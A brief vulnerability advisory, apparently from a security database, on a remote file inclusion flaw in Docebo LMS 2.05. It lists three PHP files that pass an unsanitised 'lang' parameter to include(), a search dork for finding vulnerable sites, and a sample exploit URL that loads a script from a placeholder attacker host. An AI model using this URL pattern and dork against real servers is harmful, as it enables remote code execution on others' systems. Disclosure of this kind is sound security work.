Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12838
HistoryMay 27, 2006 - 12:00 a.m.

Docebo LMS 2.05 Remote File Include

2006-05-2700:00:00
vulners.com
30

Vulnerable Script: Docebo LMS 2.05
Discovered: beford <xbefordx gmail com>

Noobs: %22Based+on+DoceboLMS+2.0%22

Vulnerable Files

doceboLMS205/modules/credits/business.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/credits.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php');

http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://&lt;evilh4x0rscript&gt;/?